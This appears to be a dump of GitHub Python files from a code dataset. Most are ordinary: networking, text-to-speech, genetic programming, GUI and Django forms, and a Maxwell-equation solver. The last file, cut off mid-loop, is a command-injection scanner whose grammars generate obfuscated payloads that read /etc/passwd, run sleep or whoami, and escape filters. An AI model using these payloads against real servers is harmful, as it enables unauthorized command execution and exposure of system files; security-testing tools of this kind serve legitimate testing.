pong once the connection is closed.\n \"\"\"\n assert self.state is State.CLOSED\n exc = self.connection_closed_exc()\n\n for ping in self.pings.values():\n ping.set_exception(exc)\n # If the exception is never retrieved, it will be logged when ping\n # is garbage-collected. 
This is confusing for users.\n # Given that ping is done (with an exception), canceling it does\n # nothing, but it prevents logging the exception.\n ping.cancel()\n\n if self.pings:\n pings_hex = \", \".join(ping_id or \"[empty]\" for ping_id in self.pings)\n logger.debug(\"server - aborted pending ping: %s\", pings_hex)\n","repo_name":"tsifrer/ark","sub_path":"chain/p2p/socket_protocol.py","file_name":"socket_protocol.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"31352150435","text":"import speech\nimport pyperclip\nfrom Sound import play\nimport Text\nfrom pathlib import Path\nfrom conf import *\nimport cache\n\nPROGRESS_REPORT = Text.template(\"\\nSegment {}:\\n------\\n{}\")\nCACHE_REPORT = Text.template(\"Playing text.\\nText:\\n{}\")\nSHORT_REPORT = Text.template(\"Text:\\n{}\")\n\ndef speak(text):\n\t\"\"\"Synthesize and play a speech\n\n\tArgs:\n\t\ttext (str): Text to synthesize\n\n\tReturns:\n\t\tNone\n\t\"\"\"\n\n\t# Preprocess text\n\ttext = Text.clean(text)\n\n\t# Play cached speech if possible\n\tcached_speech = cache.retrieve(text)\n\tif cached_speech:\n\t\tCACHE_REPORT((text,))\n\t\tplay(cached_speech[1])\n\t\treturn\n\n\tprint(\"Synthesizing speech\")\n\tsegments = Text.paginate(text, conf.page_limit)\n\n\t# If speech is short, flush it to disk before playing\n\t# (speeds up retries for interrupted speeches)\n\tif len(segments) == 1:\n\t\ttext = segments[0][1]\n\t\tSHORT_REPORT((text,))\n\t\tbuffer = speech.synth(text)\n\t\tmp3 = cache.store(text, buffer)\n\t\tplay(mp3)\n\t\treturn\n\n\tbuffers = []\n\tfor num, text in segments:\n\t\tPROGRESS_REPORT((num, text))\n\t\tstream = speech.synth(text)\n\t\tbuffers.append(stream)\n\t\tplay(stream)\n\tbuffer = b\"\".join(buffers)\n\tcache.store(text, buffer)\n\ndef stdin():\n\treturn speak(sys.stdin.readlines())\n\ndef clip():\n\treturn speak(pyperclip.paste())\n\nif __name__ == \"__main__\":\n\tspeak(\"Henlo, I am Borb.\")","repo_name":"maxsu/borb","sub_path":"borb/borb.py","file_name":"borb.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71389776166","text":"import random\nfrom utils import Utils\nfrom gpParser import GpParser\n\nclass Evolution(Utils):\n def __init__(self, state, fitness, config):\n self.state = state\n self.fitness = fitness\n self.config = config\n\n def _mutation(self, parent_index):\n parent_stack_copy = self.state.stack[parent_index][:]\n parent_stack_length = len(parent_stack_copy)\n \n for i in range(parent_stack_length):\n random_number = random.randint(0, 100)\n\n if random_number > self.config.mut_prob_per_node:\n continue\n\n token = parent_stack_copy[i]\n\n # If the random token is a scope, input/output or equation, continue\n if (self.is_open_scope(token) or \n self.is_close_scope(token) or\n self.is_input(token) or\n self.is_output(token) or\n self.is_equation(token)\n ): \n continue\n\n elif self.is_operation(token):\n # Replace operation\n random_operation = self.choose_random_operation(token)\n parent_stack_copy[i] = random_operation\n # print(f\"Mutated operation from {token} to {random_operation} at index {i}\")\n\n elif self.is_condition(token):\n # Replace condition\n random_condition = self.choose_random_condition(token)\n parent_stack_copy[i] = random_condition\n # print(f\"Mutated 
condition to from {token} to {random_condition} at index {i}\")\n \n \n elif self.is_if(token):\n # Replace if statement to while loop\n parent_stack_copy[i] = self.config.syntax['while']\n # print(f\"Mutated if statement to while loop at index {i}\")\n \n \n elif self.is_while(token):\n # Replace while loop to if statement\n parent_stack_copy[i] = self.config.syntax['if']\n # print(f\"Mutated while loop to if statement at index {i}\")\n \n elif self.is_logic(token):\n # Replace logic\n random_logic = self.choose_random_logic(token)\n parent_stack_copy[i] = random_logic\n # print(f\"Mutated logic from {token} to {random_logic} at index {i}\")\n\n elif self.is_constant(token):\n # Replace constant\n random_const = self.choose_random_const()\n parent_stack_copy[i] = random_const\n # print(f\"Mutated constant from {token} to {random_const} at index {i}\")\n\n elif self.is_variable(token):\n # Replace variable\n random_var_index = random.randint(0, len(self.state.variables[parent_index]) - 1)\n random_variable = self.state.variables[parent_index][random_var_index]\n parent_stack_copy[i] = random_variable\n # print(f\"Mutated variable from {token} to {random_variable} at index {i}\")\n\n\n return parent_stack_copy\n\n def _crossover(self, parent1_index, parent2_index):\n pass\n\n def _tournament(self):\n best = float('-inf')\n best_indiv_index = 0\n\n for _ in range(self.config.tournament_size):\n random_indiv_index = random.randint(0, self.config.population - 1)\n fitness = self.state.get_fitness(random_indiv_index)\n if fitness > best:\n best = fitness\n best_indiv_index = random_indiv_index\n \n return best_indiv_index\n \n def negative_tournament(self):\n worst = float('inf')\n worst_indiv_index = 0\n\n for _ in range(self.config.tournament_size):\n random_indiv_index = random.randint(0, self.config.population - 1)\n fitness = self.state.get_fitness(random_indiv_index)\n if fitness < worst:\n worst = fitness\n worst_indiv_index = random_indiv_index\n \n return worst_indiv_index\n \n def stats(self, g):\n fitness_avg = -sum(self.state.fitness) / len(self.state.fitness)\n best_fitness = max(self.state.fitness)\n best_indiv_index = self.state.fitness.index(best_fitness)\n best_indiv = self.state.stack[best_indiv_index]\n gpParser = GpParser(best_indiv)\n indiv = gpParser.parse()\n print(f\"Generation: {g} \\nAvg_fitness: {fitness_avg} \\nBest_fitness: {-best_fitness} \\nBest_individual: {indiv}\\n\")\n\n def problem_solved(self):\n best_indiv_index = self.state.fitness.index(0)\n best_indiv = self.state.stack[best_indiv_index]\n gpParser = GpParser(best_indiv)\n indiv = gpParser.parse()\n print(f\"\\n\\n\\nFound solution: {indiv}\\n\\n\")\n return 1 \n \n def evolve(self):\n for g in range(self.config.generations):\n self.stats(g)\n if max(self.state.fitness) == 0:\n return self.problem_solved()\n \n # print(f\"Generation {g}\")\n for i in range(self.config.population):\n evolution_type = self.get_random_evolution_type()\n\n if evolution_type == 'crossover':\n # print(f\"Individual {i} will be crossed over\")\n # TODO: What if parents are the same?\n parent1_index = self._tournament()\n parent2_index = self._tournament()\n continue\n pass\n\n elif evolution_type == 'mutation':\n indiv_index = self._tournament()\n new_indiv = self._mutation(indiv_index)\n\n new_fitness = self.fitness.fitness_function(new_indiv)\n\n # Get worst individual and replace it with new individual\n offspring_index = self.negative_tournament()\n self.state.replace_indiv(offspring_index, new_indiv, new_fitness)\n \n \n 
\n","repo_name":"coado/gp_generator","sub_path":"evolution.py","file_name":"evolution.py","file_ext":"py","file_size_in_byte":6101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"7588493982","text":"# Create a star class\r\n\r\nfrom random import randint\r\nimport turtle\r\n\r\nstella=turtle.Turtle()\r\ncielo=turtle.Screen()\r\n\r\nclass Stella():\r\n    def __init__(self,x,y,n):\r\n        self.x = x\r\n        self.y = y\r\n        self.n = n\r\n    \r\n    def disegna_stella(self):\r\n        stella.speed(1000)\r\n        stella.penup()\r\n        stella.goto(self.x,self.y)\r\n        stella.pendown()\r\n\r\n        for _ in range(5):\r\n            stella.forward(100)\r\n            stella.right(144)\r\n    \r\n\r\n\r\ndef main():\r\n    for _ in range(50): \r\n        s1 = Stella(randint(-400,400),randint(-400,400),5)\r\n        s1.disegna_stella()\r\n    \r\n    cielo.exitonclick()\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"alemigliore/Esercizi_python","sub_path":"python/Es_040_classeStella.py","file_name":"Es_040_classeStella.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"37390135106","text":"def polindrom():\r\n    for number in range(1, 2000): # numbers from 1 to 2000 (2000 excluded)\r\n        if str(number) == str(number)[::-1]: # if the reversed string equals the original\r\n            print(number) # print the number from this loop iteration\r\n\r\n# polindrom()\r\n\r\n\r\ndef sum_of_numbers():\r\n    output = 0\r\n    for number in range(1, 1000): # numbers from 1 to 1000 (1000 excluded)\r\n        if number % 3 == 0 and number % 5 == 0: # check divisibility by 3 and 5\r\n            output += number # accumulate the sum\r\n    return output\r\n\r\n# print(sum_of_numbers())\r\n\r\n\r\ndef factorial(n):\r\n    sum_of_factorial = 1\r\n    for number in range(1, n+1): # numbers up to n\r\n        sum_of_factorial = sum_of_factorial * number\r\n    return sum_of_factorial\r\n\r\nprint(factorial(6))","repo_name":"jamshidyerzakov/ArticlesTranslated","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"8667234997","text":"from PyQt5.QtWidgets import QApplication, QWidget, QLabel, QVBoxLayout, QHBoxLayout, QPushButton, QLineEdit\n\n\nclass Animal:\n    def speak(self):\n        pass\n\n\nclass Dog(Animal):\n    def speak(self):\n        return \"Woof!\"\n\n\nclass Cat(Animal):\n    def speak(self):\n        return \"Meow!\"\n\n\nclass AnimalFactory:\n    @staticmethod\n    def get_animal_classes():\n        return {\n            \"Dog\": Dog,\n            \"Cat\": Cat\n        }\n\n    @staticmethod\n    def create_animal(animal_type):\n        animal_classes = AnimalFactory.get_animal_classes()\n        animal_class = animal_classes.get(animal_type, None)\n        return animal_class()\n\n\nclass MainWindow(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.setWindowTitle(\"Animal Factory\")\n        self.layout = QVBoxLayout(self)\n        self.animal_name = QLabel(\"Enter an animal name:\")\n        self.animal_name_edit = QLineEdit()\n        self.layout.addWidget(self.animal_name)\n        self.layout.addWidget(self.animal_name_edit)\n        self.create_buttons()\n        self.result_label = QLabel()\n        self.layout.addWidget(self.result_label)\n\n    def create_buttons(self):\n        button_layout = QHBoxLayout()\n        self.layout.addLayout(button_layout)\n\n        create_dog_btn = QPushButton(\"Create Dog\")\n        create_dog_btn.clicked.connect(lambda: self.create_animal(\"Dog\"))\n        
button_layout.addWidget(create_dog_btn)\n\n create_cat_btn = QPushButton(\"Create Cat\")\n create_cat_btn.clicked.connect(lambda: self.create_animal(\"Cat\"))\n button_layout.addWidget(create_cat_btn)\n\n def create_animal(self, animal_type):\n animal = AnimalFactory.create_animal(animal_type)\n if animal:\n self.result_label.setText(animal.speak())\n\n\n\nif __name__ == \"__main__\":\n app = QApplication([])\n main_window = MainWindow()\n main_window.show()\n app.exec_()\n","repo_name":"syurskyi/Python_Topics","sub_path":"120_design_patterns/003_factories/pyqt/Factory_Method/004.py","file_name":"004.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"37338193984","text":"import sys\n\ndef merge(N1:int,N2:int,A1:list[int],A2:list[int]):\n ANS = []\n for x in A1:\n ANS.append(x)\n for x in A2:\n ANS.append(x)\n return ANS\n\ninput_file = open(sys.argv[1],\"r\")\n\ntext = input_file.readlines()\n\nN1 = int(text[0].strip().split()[0])\nN2 = int(text[0].strip().split()[1])\n\nA1 = [int(x.strip()) for x in text[1].split()[0:N1]]\nA2 = [int(x.strip()) for x in text[1].split()[N1:N1+N2]]\n\nprint(merge(N1,N2,A1,A2))\n","repo_name":"basu-abhinav/automatic_program_evaluation","sub_path":"merge_arrays/merge_2.py","file_name":"merge_2.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34392175930","text":"\"\"\"grudge operators modelling electromagnetic phenomena.\"\"\"\n\n__copyright__ = \"\"\"\nCopyright (C) 2007-2017 Andreas Kloeckner\nCopyright (C) 2010 David Powell\nCopyright (C) 2017 Bogdan Enache\n\"\"\"\n\n__license__ = \"\"\"\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\nfrom pytools import memoize_method\n\nfrom grudge.models import HyperbolicOperator\nfrom meshmode.mesh import BTAG_ALL, BTAG_NONE\nfrom grudge import sym\nfrom pytools.obj_array import flat_obj_array, make_obj_array\n\n\nclass MaxwellOperator(HyperbolicOperator):\n \"\"\"A strong-form 3D Maxwell operator which supports fixed or variable\n isotropic, non-dispersive, positive epsilon and mu.\n\n Field order is [Ex Ey Ez Hx Hy Hz].\n \"\"\"\n\n _default_dimensions = 3\n\n def __init__(self, epsilon, mu,\n flux_type,\n bdry_flux_type=None,\n pec_tag=BTAG_ALL,\n pmc_tag=BTAG_NONE,\n absorb_tag=BTAG_NONE,\n incident_tag=BTAG_NONE,\n incident_bc=lambda maxwell_op, e, h: 0, current=0, dimensions=None):\n \"\"\"\n :arg flux_type: can be in [0,1] for anything between central and upwind,\n or \"lf\" for Lax-Friedrichs\n :arg epsilon: can be a number, for fixed material throughout the\n computation domain, or a TimeConstantGivenFunction for spatially\n variable material coefficients\n :arg mu: can be a number, for fixed material throughout the computation\n domain, or a TimeConstantGivenFunction for spatially variable material\n coefficients\n :arg incident_bc_getter: a function of signature *(maxwell_op, e, h)* that\n accepts *e* and *h* as a symbolic object arrays\n returns a symbolic expression for the incident\n boundary condition\n \"\"\"\n\n self.dimensions = dimensions or self._default_dimensions\n\n space_subset = [True]*self.dimensions + [False]*(3-self.dimensions)\n\n e_subset = self.get_eh_subset()[0:3]\n h_subset = self.get_eh_subset()[3:6]\n\n from grudge.tools import SubsettableCrossProduct\n self.space_cross_e = SubsettableCrossProduct(\n op1_subset=space_subset,\n op2_subset=e_subset,\n result_subset=h_subset)\n self.space_cross_h = SubsettableCrossProduct(\n op1_subset=space_subset,\n op2_subset=h_subset,\n result_subset=e_subset)\n\n self.epsilon = epsilon\n self.mu = mu\n\n from pymbolic.primitives import is_constant\n self.fixed_material = is_constant(epsilon) and is_constant(mu)\n\n self.flux_type = flux_type\n if bdry_flux_type is None:\n self.bdry_flux_type = flux_type\n else:\n self.bdry_flux_type = bdry_flux_type\n\n self.pec_tag = pec_tag\n self.pmc_tag = pmc_tag\n self.absorb_tag = absorb_tag\n self.incident_tag = incident_tag\n\n self.current = current\n self.incident_bc_data = incident_bc\n\n def flux(self, w):\n \"\"\"The numerical flux for variable coefficients.\n\n :param flux_type: can be in [0,1] for anything between central and upwind,\n or \"lf\" for Lax-Friedrichs.\n\n As per Hesthaven and Warburton page 433.\n \"\"\"\n\n normal = sym.normal(w.dd, self.dimensions)\n\n if self.fixed_material:\n e, h = self.split_eh(w)\n epsilon = self.epsilon\n mu = self.mu\n\n Z_int = (mu/epsilon)**0.5 # noqa: N806\n Y_int = 1/Z_int # noqa: N806\n Z_ext = (mu/epsilon)**0.5 # noqa: N806\n Y_ext = 1/Z_ext # noqa: N806\n\n if self.flux_type == \"lf\":\n # if self.fixed_material:\n # max_c = (self.epsilon*self.mu)**(-0.5)\n\n return flat_obj_array(\n # flux e,\n 1/2*(\n -self.space_cross_h(normal, h.ext-h.int)\n # multiplication by epsilon undoes material divisor below\n #-max_c*(epsilon*e.int - epsilon*e.ext)\n ),\n # flux h\n 1/2*(\n self.space_cross_e(normal, e.ext-e.int)\n # multiplication by mu undoes material 
divisor below\n #-max_c*(mu*h.int - mu*h.ext)\n ))\n elif isinstance(self.flux_type, (int, float)):\n # see doc/maxima/maxwell.mac\n return flat_obj_array(\n # flux e,\n (\n -1/(Z_int+Z_ext)*self.space_cross_h(normal,\n Z_ext*(h.ext-h.int)\n - self.flux_type*self.space_cross_e(normal, e.ext-e.int))\n ),\n # flux h\n (\n 1/(Y_int + Y_ext)*self.space_cross_e(normal,\n Y_ext*(e.ext-e.int)\n + self.flux_type*self.space_cross_h(normal, h.ext-h.int))\n ),\n )\n else:\n raise ValueError(\"maxwell: invalid flux_type (%s)\"\n % self.flux_type)\n\n def local_derivatives(self, w):\n \"\"\"Template for the spatial derivatives of the relevant components of\n :math:`E` and :math:`H`\n \"\"\"\n\n e, h = self.split_eh(w)\n\n nabla = sym.nabla(self.dimensions)\n\n def e_curl(field):\n return self.space_cross_e(nabla, field)\n\n def h_curl(field):\n return self.space_cross_h(nabla, field)\n\n # in conservation form: u_t + A u_x = 0\n return flat_obj_array(\n (self.current - h_curl(h)),\n e_curl(e)\n )\n\n def pec_bc(self, w):\n \"\"\"Construct part of the flux operator template for PEC boundary conditions\n \"\"\"\n e, h = self.split_eh(w)\n\n pec_e = sym.cse(sym.project(\"vol\", self.pec_tag)(e))\n pec_h = sym.cse(sym.project(\"vol\", self.pec_tag)(h))\n\n return flat_obj_array(-pec_e, pec_h)\n\n def pmc_bc(self, w):\n \"\"\"Construct part of the flux operator template for PMC boundary conditions\n \"\"\"\n e, h = self.split_eh(w)\n\n pmc_e = sym.cse(sym.project(\"vol\", self.pmc_tag)(e))\n pmc_h = sym.cse(sym.project(\"vol\", self.pmc_tag)(h))\n\n return flat_obj_array(pmc_e, -pmc_h)\n\n def absorbing_bc(self, w):\n \"\"\"Construct part of the flux operator template for 1st order\n absorbing boundary conditions.\n \"\"\"\n\n absorb_normal = sym.normal(self.absorb_tag, self.dimensions)\n\n e, h = self.split_eh(w)\n\n if self.fixed_material:\n epsilon = self.epsilon\n mu = self.mu\n\n absorb_Z = (mu/epsilon)**0.5 # noqa: N806\n absorb_Y = 1/absorb_Z # noqa: N806\n\n absorb_e = sym.cse(sym.project(\"vol\", self.absorb_tag)(e))\n absorb_h = sym.cse(sym.project(\"vol\", self.absorb_tag)(h))\n\n bc = flat_obj_array(\n absorb_e + 1/2*(self.space_cross_h(absorb_normal, self.space_cross_e(\n absorb_normal, absorb_e))\n - absorb_Z*self.space_cross_h(absorb_normal, absorb_h)),\n absorb_h + 1/2*(\n self.space_cross_e(absorb_normal, self.space_cross_h(\n absorb_normal, absorb_h))\n + absorb_Y*self.space_cross_e(absorb_normal, absorb_e)))\n\n return bc\n\n def incident_bc(self, w):\n \"\"\"Flux terms for incident boundary conditions\"\"\"\n # NOTE: Untested for inhomogeneous materials, but would usually be\n # physically meaningless anyway (are there exceptions to this?)\n\n e, h = self.split_eh(w)\n\n from grudge.tools import count_subset\n fld_cnt = count_subset(self.get_eh_subset())\n\n from grudge.tools import is_zero\n incident_bc_data = self.incident_bc_data(self, e, h)\n if is_zero(incident_bc_data):\n return make_obj_array([0]*fld_cnt)\n else:\n return sym.cse(-incident_bc_data)\n\n def sym_operator(self, w=None):\n \"\"\"The full operator template - the high level description of\n the Maxwell operator.\n\n Combines the relevant operator templates for spatial\n derivatives, flux, boundary conditions etc.\n \"\"\"\n from grudge.tools import count_subset\n w = sym.make_sym_array(\"w\", count_subset(self.get_eh_subset()))\n\n elec_components = count_subset(self.get_eh_subset()[0:3])\n mag_components = count_subset(self.get_eh_subset()[3:6])\n\n if self.fixed_material:\n # need to check this\n material_divisor = 
(\n [self.epsilon]*elec_components+[self.mu]*mag_components)\n\n tags_and_bcs = [\n (self.pec_tag, self.pec_bc(w)),\n (self.pmc_tag, self.pmc_bc(w)),\n (self.absorb_tag, self.absorbing_bc(w)),\n (self.incident_tag, self.incident_bc(w)),\n ]\n\n def flux(pair):\n return sym.project(pair.dd, \"all_faces\")(self.flux(pair))\n\n return (\n - self.local_derivatives(w)\n - sym.InverseMassOperator()(sym.FaceMassOperator()(\n flux(sym.int_tpair(w))\n + sum(\n flux(sym.bv_tpair(tag, w, bc))\n for tag, bc in tags_and_bcs)\n ))) / material_divisor\n\n @memoize_method\n def partial_to_eh_subsets(self):\n \"\"\"Helps find the indices of the E and H components, which can vary\n depending on number of dimensions and whether we have a full/TE/TM\n operator.\n \"\"\"\n\n e_subset = self.get_eh_subset()[0:3]\n h_subset = self.get_eh_subset()[3:6]\n\n from grudge.tools import partial_to_all_subset_indices\n return tuple(partial_to_all_subset_indices(\n [e_subset, h_subset]))\n\n def split_eh(self, w):\n \"\"\"Splits an array into E and H components\"\"\"\n e_idx, h_idx = self.partial_to_eh_subsets()\n e, h = w[e_idx], w[h_idx]\n\n return e, h\n\n def get_eh_subset(self):\n \"\"\"Return a 6-tuple of :class:`bool` objects indicating whether field\n components are to be computed. The fields are numbered in the order\n specified in the class documentation.\n \"\"\"\n return 6*(True,)\n\n def max_eigenvalue_expr(self):\n \"\"\"Return the largest eigenvalue of Maxwell's equations as a hyperbolic\n system.\n \"\"\"\n from math import sqrt\n if self.fixed_material:\n return 1/sqrt(self.epsilon*self.mu) # a number\n else:\n import grudge.symbolic as sym\n return sym.NodalMax()(1/sym.FunctionSymbol(\"sqrt\")(self.epsilon*self.mu))\n\n def max_eigenvalue(self, t, fields=None, discr=None, context={}):\n if self.fixed_material:\n return self.max_eigenvalue_expr()\n else:\n raise ValueError(\"max_eigenvalue is no longer supported for \"\n \"variable-coefficient problems--use max_eigenvalue_expr\")\n\n def check_bc_coverage(self, mesh):\n from meshmode.mesh import check_bc_coverage\n check_bc_coverage(mesh, [\n self.pec_tag,\n self.pmc_tag,\n self.absorb_tag,\n self.incident_tag])\n\n\nclass TMMaxwellOperator(MaxwellOperator):\n \"\"\"A 2D TM Maxwell operator with PEC boundaries.\n\n Field order is [Ez Hx Hy].\n \"\"\"\n\n _default_dimensions = 2\n\n def get_eh_subset(self):\n return (\n (False, False, True) # only ez\n + (True, True, False) # hx and hy\n )\n\n\nclass TEMaxwellOperator(MaxwellOperator):\n \"\"\"A 2D TE Maxwell operator.\n\n Field order is [Ex Ey Hz].\n \"\"\"\n\n _default_dimensions = 2\n\n def get_eh_subset(self):\n return (\n (True, True, False) # ex and ey\n + (False, False, True) # only hz\n )\n\n\nclass TE1DMaxwellOperator(MaxwellOperator):\n \"\"\"A 1D TE Maxwell operator.\n\n Field order is [Ex Ey Hz].\n \"\"\"\n\n _default_dimensions = 1\n\n def get_eh_subset(self):\n return (\n (True, True, False)\n + (False, False, True)\n )\n\n\nclass SourceFree1DMaxwellOperator(MaxwellOperator):\n \"\"\"A 1D TE Maxwell operator.\n\n Field order is [Ey Hz].\n \"\"\"\n\n _default_dimensions = 1\n\n def get_eh_subset(self):\n return (\n (False, True, False)\n + (False, False, True)\n )\n\n\ndef get_rectangular_cavity_mode(E_0, mode_indices): # noqa: N803\n \"\"\"A rectangular TM cavity mode for a rectangle / cube\n with one corner at the origin and the other at (1,1[,1]).\"\"\"\n dims = len(mode_indices)\n if dims != 2 and dims != 3:\n raise ValueError(\"Improper mode_indices dimensions\")\n import numpy\n\n 
factors = [n*numpy.pi for n in mode_indices]\n\n    kx, ky = factors[0:2]\n    if dims == 3:\n        kz = factors[2]\n\n    omega = numpy.sqrt(sum(f**2 for f in factors))\n\n    nodes = sym.nodes(dims)\n    x = nodes[0]\n    y = nodes[1]\n    if dims == 3:\n        z = nodes[2]\n\n    sx = sym.sin(kx*x)\n    cx = sym.cos(kx*x)\n    sy = sym.sin(ky*y)\n    cy = sym.cos(ky*y)\n    if dims == 3:\n        sz = sym.sin(kz*z)\n        cz = sym.cos(kz*z)\n\n    if dims == 2:\n        tfac = sym.ScalarVariable(\"t\") * omega\n\n        result = flat_obj_array(\n            0,\n            0,\n            sym.sin(kx * x) * sym.sin(ky * y) * sym.cos(tfac),  # ez\n            -ky * sym.sin(kx * x) * sym.cos(ky * y) * sym.sin(tfac) / omega,  # hx\n            kx * sym.cos(kx * x) * sym.sin(ky * y) * sym.sin(tfac) / omega,  # hy\n            0,\n        )\n    else:\n        tdep = sym.exp(-1j * omega * sym.ScalarVariable(\"t\"))\n\n        gamma_squared = ky**2 + kx**2\n        result = flat_obj_array(\n            -kx * kz * E_0*cx*sy*sz*tdep / gamma_squared,  # ex\n            -ky * kz * E_0*sx*cy*sz*tdep / gamma_squared,  # ey\n            E_0 * sx*sy*cz*tdep,  # ez\n\n            -1j * omega * ky*E_0*sx*cy*cz*tdep / gamma_squared,  # hx\n            1j * omega * kx*E_0*cx*sy*cz*tdep / gamma_squared,\n            0,\n        )\n\n    return result\n","repo_name":"VincentWells/grudge","sub_path":"grudge/models/em.py","file_name":"em.py","file_ext":"py","file_size_in_byte":15216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"32384698864","text":"\n\nfrom django import forms\n\nfrom .models import Documento, Estado\nfrom zonas.models import Barrio\n\n\nclass DocumentoForm(forms.ModelForm): \n\n    nomenclatura = forms.CharField(label=\"Nomenclatura\", required=True)\n    descripcion = forms.CharField(label=\"Descripcion\", required=True)\n    estado = forms.ModelChoiceField(\n        queryset=Estado.objects.all().order_by('descripcion'), \n        label=\"Estado\",\n        required=True\n    )\n    fechaestado = forms.DateField(\n        label=\"Fecha Estado\", required=False)\n    \n    barrio = forms.ModelMultipleChoiceField(\n        widget = forms.SelectMultiple,\n        queryset = Barrio.objects.all().order_by('descripcion')\n    )\n\n    referenciadescriptiva = forms.CharField(label=\"Referencia Auxiliar\", required=False)\n\n    def __init__(self, *args, **kwargs):\n        super(DocumentoForm, self).__init__(*args, **kwargs)\n        for field in iter(self.fields):\n            print(field)\n            if field != 'barrio':\n                self.fields[field].widget.attrs.update({\n                    'class': 'pure-input-1'\n                })\n\n    class Meta:\n        model = Documento\n        fields = ['nomenclatura', 'descripcion', 'estado', 'fechaestado',\n            'barrio' ]\n\n","repo_name":"baroam0/expedientes","sub_path":"documentos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"72043161766","text":"'''\nOS command injection tool\ndetects this vulnerability using 2 techniques:\n    + result-based\n    + time-based\nfor result-based detection we only need to send payloads whose output reveals the flaw, e.g.: echo \"xyz\", python -c ....\nfor time-based detection we inject commands such as sleep(x), delay(x), ... and measure the response time to detect the flaw\n2 operating systems: windows and linux\n    There are 4 schemas in total\nPayloads are referenced from Payloads All The Things\n'''\nfrom connect import connect\nfrom a import simple_grammar_fuzzer\n\ndetect_etc_passwd = {\"root:x:x\", \"www-data:x:33:33\", \"/root:/bin/bash\", \"nologin\"}\ndetect_echo = {\"This is fking test arg\"}\ndetect_whoami = {\"www-data\"}\nclass cmd():\n\n    '''\n    def __init__(self):\n        self.detect_etc_passwd = {\"root:x:x\", \"www-data:x:33:33\", \"/root:/bin/bash\", \"nologin\"}\n        self.detect_echo = {\"This is fking test arg\"}\n        self.detect_whoami = {\"www-data\"}\n    '''\n\n    def generator(self, GRAMMAR):\n        return set([simple_grammar_fuzzer(GRAMMAR, \"<\", \">\", '<start>') for i in range(10)])\n\n    def result_base_generator(self):\n        result_based = {\n            \"<start>\" : [\"<quote><command>\"],\n            \"<quote>\" : [\"|\",\";\" ,\"&&\" , \"&\", \"%0a\"],\n            \"<command>\" : [\"<echo><spaceEcho><echoArgument>\", \"<cat><spaceCat><catArgument>\"],\n            \"<echo>\" : [\"echo\", \"e\\'c\\'h\\'o\", \"e\\\"c\\\"h\\\"o\", \"ech$@o\"],\n            \"<cat>\" : [\"cat\", \"c\\'a\\'t\", \"c\\\"a\\\"t\", \"ca$@t\"],\n            \"<spaceEcho>\" : [\" \", \" -e \", \"%20\"],\n            \"<spaceCat>\" : [\"<\", \"$IFS\", \" \", \"%20\"],\n            \"<echoArgument>\" : [\"This is fking test arg\"],\n            \"<catArgument>\" : [\n                \"/etc/passwd\", \"\\\"\\\\x2f\\\\x65\\\\x74\\\\x63\\\\x2f\\\\x70\\\\x61\\\\x73\\\\x73\\\\x77\\\\x64\\\"\" , \n                \"${HOME:0:1}etc${HOME:0:1}passwd\", \"$(echo . | tr '!-0' '\\\"-1')etc$(echo . | tr '!-0' '\\\"-1')passwd\"\n            ]\n        }\n        return self.generator(result_based)\n\n    def time_base_generator(self):\n        time_based = {\n            \"<start>\" : [\"<quote><command>\"],\n            \"<quote>\" : [\"|\", \";\"],\n            \"<command>\" : [\"timeout<space><time>\", \"delay<space><time>\", \"sleep<space><time>\", \"dir\"],\n            \"<space>\" : [\" \", \"%20\"],\n            \"<time>\" : [\"5\"]\n        }\n        return self.generator(time_based)\n\n    def another_command(self):\n        another = {\n            \"<start>\" : [\"<quote><command>\"],\n            \"<command>\" : [\"dir\", \"ls\", \"id\", \"i'd'\", \"i\\\"d\\\"\" \"w'h'o'a'm'i'\", \"w\\\"h\\\"o\\\"a\\\"m\\\"i\\\"\" \"'u'n'a'm'e' -a\", \"\\\"u\\\"n\\\"a\\\"m\\\"e\\\" -a\"],\n            \"<quote>\" : [\"|\", \";\", \"&&\", \"&\"]\n        }\n        return self.generator(another)\n\n    \n    def scan(self,url, method, params, cookies):\n        import random\n        import time\n        j = 0\n        \n        payloads = self.time_base_generator()\n        payloads.update(self.another_command())\n        payloads.update(self.result_base_generator())\n        payloadList = list(payloads)\n        for payload in payloads:\n            if j == 5:\n         